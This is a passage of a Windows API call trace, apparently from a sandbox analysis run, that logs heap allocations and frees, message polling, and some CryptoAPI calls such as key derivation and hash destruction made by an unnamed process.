RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0135.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0135.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0135.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0135.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0135.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0135.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0135.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0135.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0135.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0135.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0135.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0135.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0135.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e50bf0 [0135.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e50bf0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0135.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0135.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0135.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0135.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0135.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0135.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0135.837] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87490, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87410) returned 1 [0135.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0135.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0135.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0135.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0135.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0135.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0135.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0135.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0135.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0135.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0135.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0135.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0135.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0135.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0135.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0135.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0135.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0135.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0135.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0135.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0135.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0135.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0135.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0135.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0135.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0135.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0135.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0135.838] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0135.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0135.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0135.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0135.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0135.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0135.839] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0135.839] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0135.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0135.839] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0135.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0135.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0135.839] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0135.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0135.839] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0135.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0135.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0135.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0135.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0135.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0135.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0135.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0135.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0135.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507d0 [0135.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0135.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0135.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0135.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0135.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0135.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0135.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508d8 [0135.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0135.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0135.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0135.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0135.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0135.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0135.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0135.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0135.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0135.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0135.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ad0 [0135.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ba8 [0135.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0135.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509c8 [0135.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a58 [0135.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0135.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0135.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0135.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0135.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0135.956] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0135.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0135.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0135.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a10 [0135.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0135.957] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0135.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0135.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0135.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0135.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0135.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0135.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0135.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0135.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0135.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0135.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0135.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0135.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0135.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0135.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0135.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0135.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0135.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0135.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0135.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0135.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0135.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0135.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0135.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0135.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0135.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0135.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0135.958] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0135.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0135.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0135.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0135.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0135.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0135.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0135.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0135.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0135.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0135.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0135.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0135.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0135.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0135.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0135.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0135.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0135.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0135.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0135.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0135.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0135.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0135.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69b28 [0135.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69b28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0135.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0135.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0135.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0135.959] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0135.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0135.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0135.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0135.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0135.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0135.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0135.960] CryptDestroyHash (hHash=0xa87490) returned 1 [0135.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0135.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0135.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0135.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0135.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0135.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0135.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0135.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0135.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0135.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0135.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0135.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0135.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0135.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0135.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0135.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0135.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0135.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0135.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0135.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0135.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0135.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0135.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0135.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0135.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0135.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0135.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0135.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0135.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0135.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0135.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0135.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0135.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0135.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0135.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0135.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0135.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0135.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0135.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0135.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0135.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0135.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0135.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0135.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0135.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0135.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0135.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0135.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0135.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0135.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0135.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0135.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0135.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0135.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0135.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0135.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0135.962] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0135.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0135.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0135.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0135.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0135.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0135.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0135.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0135.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0135.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0135.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0135.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0135.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0135.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0135.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0135.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0135.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0135.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0135.963] HeapFree (in: hHeap=0x970000, 